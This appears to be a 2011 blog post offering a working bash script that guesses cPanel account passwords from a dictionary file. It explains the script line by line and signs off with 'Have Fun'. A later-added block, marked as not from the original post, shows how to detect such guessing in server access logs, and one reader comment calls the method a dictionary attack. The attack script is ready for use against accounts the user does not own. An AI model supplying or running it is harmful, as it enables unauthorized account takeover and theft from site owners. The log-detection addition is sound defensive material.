
BruteForce tool using linux shell script June 17, 2011

Posted by hasnain110 in Uncategorized.

Hello, have you ever tried to brute force a website login page and couldn't find the right tool?
It always happens, so I will explain how I did it with a Linux shell script.

I wrote a small script to brute force Cpanel accounts:
============================================
#!/usr/bin/env bash
# Cpanel BruteForce v1.0
# Coded By Dr.Death 2008
# drdeath[at]bsdmail.org
#
# This is a simple script that will brute force Cpanel account
#
# I do not take any responsibility for what you do with this tool
# Hopefully it will make your life easier rather than making other
# peoples lives more difficult!
#############################
# _____ _____ _ _
# | __ \ | __ \ | | | |
# | | | |_ __| | | | ___ __ _| |_| |__
# | | | | '__| | | |/ _ \/ _` | __| '_ \
# | |__| | | _| |__| | __/ (_| | |_| | | |
# |_____/|_|(_)_____/ \___|\__,_|\__|_| |_|

#############################

echo ".::Cpanel BruteForcer By Dr.Death::."
echo
echo -n "Enter domain name for the Cpanel account you want bruteforce:
> "
read site

n=`cat pass_list | wc -l`
for (( i=1; i <= $n; i++));
do

password=`sed -n "$i"p pass_list`

b=`lynx -dump -nolist -auth="$password" ""$site":2082"`

echo trying password $password

if [ ! -z "$b" ]; then

echo "Bengo WebSite "$site" password is: "$password""
echo "Have Fun ;)"
exit 0
fi
done
echo
echo "brute force complete"
echo "no luck, try better dictionary"
exit
==========================================

Let's explain what we did:

#!/usr/bin/env bash
This runs the script with the bash shell, located through the environment ("env").

read site
This stores the user input in the variable "$site", which will be the website domain name.

n=`cat pass_list | wc -l`
This counts the lines in the file "pass_list", which holds the password list, and stores the count in "$n".

for (( i=1; i <= $n; i++));
We use the number stored in "$n" as the bound of a for loop. For example, if the file pass_list has 1000 passwords in it, the loop runs 1000 times to try all the passwords.

password=`sed -n "$i"p pass_list`
Here we use "sed", the stream editor, with the "p" command to print one password from pass_list on each pass through the loop.
For example, in loop number 4 the variable $i has the value 4 and the sed command becomes:
"sed -n 4p pass_list", which prints the 4th line of the password file pass_list.

b=`lynx -dump -nolist -auth="$password" ""$site":2082"`
Here we use "lynx", the Linux command-line browser, as a socket to connect to the target website.
We use the option "-dump" to dump the output instead of waiting for user action, "-nolist" to disable the link list feature in dumps, and "-auth=" to set the authorization ID and password for protected documents.
For example, to access the cPanel account for the website "example.com" with username "user" and password "pass", the command looks like this:
"lynx -dump -nolist -auth=user:pass http://www.example.com:2082"

So the password file pass_list should contain the usernames and passwords in this format: "username:password"

if [ ! -z "$b" ]; then
Here we use an if statement with the test "! -z", which means: if the value of "$b" is not of zero length (not empty), we are logged in, the password is the value of the variable "$password" in the current loop iteration, and the script exits successfully; otherwise the loop continues.

Note: You will need your own password dictionary file to make it work
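
Seen from the server side, the loop above shows up in the access log as a run of HTTP 401 responses to a single client, possibly ending in a 200. The following is an added example, not part of the original post, that flags that pattern; the Common Log Format layout, the threshold, the function names and the sample lines are all assumptions made for illustration.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): spot the access-log pattern a
# password-guessing loop leaves behind, i.e. many HTTP 401 responses to one
# client, and whether a 200 followed them. Common Log Format is assumed.

# Constructed sample log lines using documentation-only addresses.
sample_log() {
cat <<'EOF'
203.0.113.7 - user [17/Jun/2011:10:00:01 +0000] "GET / HTTP/1.0" 401 381
203.0.113.7 - user [17/Jun/2011:10:00:01 +0000] "GET / HTTP/1.0" 401 381
203.0.113.7 - user [17/Jun/2011:10:00:02 +0000] "GET / HTTP/1.0" 401 381
203.0.113.7 - user [17/Jun/2011:10:00:02 +0000] "GET / HTTP/1.0" 401 381
203.0.113.7 - user [17/Jun/2011:10:00:03 +0000] "GET / HTTP/1.0" 200 5120
198.51.100.23 - admin [17/Jun/2011:11:30:10 +0000] "GET / HTTP/1.0" 401 381
198.51.100.23 - admin [17/Jun/2011:11:30:11 +0000] "GET / HTTP/1.0" 401 381
198.51.100.23 - admin [17/Jun/2011:11:30:12 +0000] "GET / HTTP/1.0" 401 381
192.0.2.10 - alice [17/Jun/2011:12:00:00 +0000] "GET / HTTP/1.1" 401 381
192.0.2.10 - alice [17/Jun/2011:12:00:09 +0000] "GET / HTTP/1.1" 200 5120
EOF
}

# detect_auth_guessing LIMIT   (reads the log on stdin)
# Prints "ip failures verdict" for each client with at least LIMIT 401s.
# Field 1 is the client address and field 9 the HTTP status in this layout.
detect_auth_guessing() {
  awk -v limit="$1" '
    $9 == 401 { fails[$1]++; next }                  # failed authentication
    $9 == 200 && fails[$1] >= limit { hit[$1] = 1 }  # success after a run
    END {
      for (ip in fails)
        if (fails[ip] >= limit)
          print ip, fails[ip], ((ip in hit) ? "login-after-failures" : "failures-only")
    }' | sort
}

# Run on the constructed sample with a threshold of 3 failures.
sample_log | detect_auth_guessing 3
```

A "login-after-failures" verdict is the one to act on first, since it suggests a guess succeeded; a single mistyped password (the 192.0.2.10 lines) stays below the threshold.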


Comments»

44. Coenster - July 26, 2015

Not True!! Using a dictionary file is NOT bruteForce, it is Dictionary Attacking. Bruteforce is the ability to use any possible character [A-Z, a-z, 0-9, !@#$%^&*_-|\/?><] in any order and any length. Bruteforce does not rely on passwd files, most passwds that I crack (I do penetration testing) are not found in dictionary files. Unless maybe you have a 50GB dictionary file. I have some pretty big ones.

But nice code nonetheless.
Maybe change the name to "Dictionary Attacking" to avoid confusion.

